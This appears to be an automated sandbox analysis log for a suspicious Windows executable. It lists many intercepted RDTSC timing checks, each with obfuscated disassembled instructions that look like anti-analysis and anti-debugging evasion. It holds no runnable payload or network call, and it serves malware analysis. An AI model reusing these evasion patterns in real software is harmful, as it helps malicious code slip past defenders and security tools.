Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7D9B2 second address: F7D9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14782h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DAC9 second address: F7DAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F646C53F7AEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DAE0 second address: F7DAF8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F646CD14776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f je 00007F646CD14780h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DAF8 second address: F7DB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c je 00007F646C53F7A6h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DB0B second address: F7DB43 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F646CD14778h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F646CD14787h 0x00000016 jmp 00007F646CD1477Dh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DB43 second address: F7DBF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov edx, dword ptr [ebp+122D3DECh] 0x00000010 push 00000003h 0x00000012 mov edi, 53A301D0h 0x00000017 push 00000000h 0x00000019 mov ch, bl 0x0000001b jmp 00007F646C53F7AEh 0x00000020 push 00000003h 0x00000022 mov esi, 34E96CBFh 0x00000027 call 00007F646C53F7A9h 0x0000002c jmp 00007F646C53F7ADh 0x00000031 push eax 0x00000032 pushad 0x00000033 je 00007F646C53F7ACh 0x00000039 jo 00007F646C53F7A6h 0x0000003f pushad 0x00000040 jmp 00007F646C53F7B6h 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 popad 0x00000049 mov eax, dword ptr [esp+04h] 0x0000004d pushad 0x0000004e jmp 00007F646C53F7ABh 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 pop edx 0x00000057 popad 0x00000058 mov eax, dword ptr [eax] 0x0000005a push edx 0x0000005b ja 00007F646C53F7ACh 0x00000061 pop edx 0x00000062 mov dword ptr [esp+04h], eax 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 jp 00007F646C53F7A6h 0x0000006f pushad 0x00000070 popad 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DBF4 second address: F7DBF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DBF9 second address: F7DBFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DCB2 second address: F7DCB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DCB6 second address: F7DCBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DCBA second address: F7DD11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007F646CD14784h 0x0000000d sbb dx, 7500h 0x00000012 push 00000000h 0x00000014 jmp 00007F646CD14783h 0x00000019 call 00007F646CD14779h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F646CD14785h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DD11 second address: F7DD34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F646C53F7A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DD34 second address: F7DD38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DD38 second address: F7DD5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F646C53F7B4h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DD5D second address: F7DD73 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F646CD14776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DD73 second address: F7DE14 instructions: 0x00000000 rdtsc 0x00000002 js 00007F646C53F7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jl 00007F646C53F7BFh 0x00000015 pop eax 0x00000016 mov ecx, 3EAEA466h 0x0000001b movsx esi, si 0x0000001e push 00000003h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F646C53F7A8h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a jnp 00007F646C53F7B2h 0x00000040 je 00007F646C53F7ACh 0x00000046 mov dword ptr [ebp+122D36D2h], ebx 0x0000004c mov dword ptr [ebp+122D3866h], eax 0x00000052 push 00000000h 0x00000054 add edi, 76A36F16h 0x0000005a push 00000003h 0x0000005c or dword ptr [ebp+122D1854h], edi 0x00000062 push 73BD0919h 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a pushad 0x0000006b popad 0x0000006c jbe 00007F646C53F7A6h 0x00000072 popad 0x00000073 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DE14 second address: F7DE2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646CD14785h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DE2D second address: F7DE91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 4C42F6E7h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F646C53F7A8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c add dword ptr [ebp+122D219Dh], edi 0x00000032 lea ebx, dword ptr [ebp+124496F3h] 0x00000038 jbe 00007F646C53F7ACh 0x0000003e sub ecx, dword ptr [ebp+122D3CA8h] 0x00000044 xchg eax, ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F646C53F7ABh 0x0000004e rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DE91 second address: F7DEA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F7DEA0 second address: F7DEAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F646C53F7A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F64FC1 second address: F64FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F646CD1477Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F64FCE second address: F64FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F646C53F7B3h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F9B9A4 second address: F9B9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F9C0EA second address: F9C0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F9C0EE second address: F9C0F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F9C3DE second address: F9C3E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F9C3E7 second address: F9C3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F646CD1477Eh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe | RDTSC instruction interceptor: First address: F9C3F6 second address: F9C402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9C402 second address: F9C40A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9C6DA second address: F9C6ED instructions: 0x00000000 rdtsc 0x00000002 jne 00007F646C53F7A6h 0x00000008 jc 00007F646C53F7A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9C835 second address: F9C839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9C839 second address: F9C83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F912A0 second address: F912A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F6B9BC second address: F6B9D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646C53F7B3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F6B9D3 second address: F6BA18 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F646CD14776h 0x00000008 jnc 00007F646CD14776h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007F646CD1478Fh 0x0000001e jns 00007F646CD1477Eh 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9CF62 second address: F9CF66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F9CF66 second address: F9CF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F646CD14776h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F646CD14788h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 js 00007F646CD14776h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F69EB1 second address: F69EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F69EB6 second address: F69ECE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jc 00007F646CD14776h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 je 00007F646CD14776h 0x00000017 pop edi 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F69ECE second address: F69EE0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F646C53F7A6h 0x00000009 pop ebx 0x0000000a jo 00007F646C53F7ACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FA0FBC second address: FA1005 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F646CD14787h 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F646CD1477Ch 0x00000019 jmp 00007F646CD14789h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FA1005 second address: FA100F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F646C53F7A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FA77EE second address: FA77F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FA805B second address: FA807E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F646C53F7A8h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F6D597 second address: F6D59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAA72E second address: FAA77A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F646C53F7AEh 0x00000008 jmp 00007F646C53F7B5h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jbe 00007F646C53F7A6h 0x00000019 jmp 00007F646C53F7B8h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAA8D2 second address: FAA8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F646CD14776h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAA8DD second address: FAA8E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAB12B second address: FAB131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FACC54 second address: FACC59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FACC59 second address: FACCA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F646CD14776h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 js 00007F646CD1478Ch 0x00000017 jmp 00007F646CD14786h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F646CD14786h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FACCA0 second address: FACCD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F646C53F7B2h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F646C53F7B7h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FACCD8 second address: FACCE6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F646CD14776h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FACFD2 second address: FACFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FACFD6 second address: FACFE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F646CD14776h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAD8F0 second address: FAD8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAD8F5 second address: FAD935 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F646CD1477Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F646CD14778h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov esi, edx 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAD935 second address: FAD93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FADCB4 second address: FADCB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FADCB8 second address: FADCCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FADE0B second address: FADE10 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAEC74 second address: FAEC78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAEB98 second address: FAEB9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAEC78 second address: FAEC82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAEC82 second address: FAECA8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F646CD14776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jng 00007F646CD14790h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F646CD14782h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAECA8 second address: FAED21 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 add di, 2586h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F646C53F7A8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D3DD0h] 0x0000002e push 00000000h 0x00000030 mov esi, dword ptr [ebp+122D21A4h] 0x00000036 call 00007F646C53F7B7h 0x0000003b push edi 0x0000003c mov esi, 2EF364E3h 0x00000041 pop edi 0x00000042 pop esi 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 jmp 00007F646C53F7B6h 0x0000004e popad 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FAED21 second address: FAED26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB06F2 second address: FB073D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a movsx edi, si 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F646C53F7A8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b stc 0x0000002c adc esi, 77A14A0Ah 0x00000032 mov dword ptr [ebp+122D1D8Eh], ebx 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e push edi 0x0000003f pop edi 0x00000040 popad 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB073D second address: FB0747 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F646CD14776h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB1C6E second address: FB1CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F646C53F7ACh 0x0000000c jg 00007F646C53F7A6h 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F646C53F7A8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e sub dword ptr [ebp+122D1D8Eh], edx 0x00000034 push 00000000h 0x00000036 xor si, 75BBh 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e cmc 0x0000003f pop esi 0x00000040 xchg eax, ebx 0x00000041 push edx 0x00000042 pushad 0x00000043 jl 00007F646C53F7A6h 0x00000049 pushad 0x0000004a popad 0x0000004b popad 0x0000004c pop edx 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB1CC7 second address: FB1CCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB1CCB second address: FB1CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB32CC second address: FB32D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB32D0 second address: FB32D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB32D6 second address: FB32E9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F646CD14778h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB4E1C second address: FB4E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB3AE5 second address: FB3AEA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
